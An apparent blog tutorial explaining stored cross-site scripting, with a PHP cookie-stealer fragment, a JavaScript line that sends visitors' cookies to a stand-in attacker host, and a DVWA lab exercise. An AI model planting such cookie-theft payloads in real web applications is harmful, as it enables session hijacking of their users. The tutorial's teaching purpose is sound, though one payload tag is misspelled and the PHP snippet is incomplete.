Stored XSS vulnerabilities are common in web application which supports interaction between several users for example, guest books, comment replies, question forms, response forms, review sections etc. If attacker manages to embed a Java script in such application then it can help him/her attack every user who will interact with his/her submitted data. Practically both attacks are performed in same way but on different type of web applications.
Performing Stored XSS Attacks
In last post to cross site scripting we discussed about how to perform a reflected XSS attack. In this following post we will discus how to perform a stored XSS attack. A stored XSS attack is said to done when attacker uses XSS vulnerability of web application to store his/her submitted script in web application’s database and then it is displayed to other users without being filtered or sanitized.
Let’s consider a real example suppose an attacker wants to steal user’s cookies from some abcxyz forum. So first of all he/she will prepare a cookie stealer, following PHP script is simple example of cookie stealer you can also create a cookie stealer with Java Script.
$cookie = $_GET[‘cookie’];
$fh = fopen(“cookies.txt”, “a”);
Now suppose he has hosted this script at http://www.attacker.com/stealer.php, where attaker.com is hacker’s website. Now while replying in a web application he/she will enter his/her name and also embed a Java Script which will call script every time when someone visits the thread or reply created by attacker. The java script might appear as follows,
document.write(‘<img style=”display: none;” src=”www.attacker.com/stealer.php?cookie=’+document.cookie+'”/>’);
To practice stored XSS attack on DVWA first set security level to low, then select “stored XSS attack”. Now in place of name type HACKER and in message section type following lines,
Visit <acript>alert(‘Hi from HACKER’)</script> <a href=“https://xtraweb.wordpress.com”>XTRA WEB</a>
After pressing submit button your message will be stored in DVWA, now post any other message you will find script embedded in your message with name HACKER will execute every time whenever a new message is posted. Now refer cheat sheet and try higher security levels. Those who can understand coding should also have their look on code snippets.
If something was difficult to understand then please feel free to ask. Thanks for reading, have a nice time and keep visiting.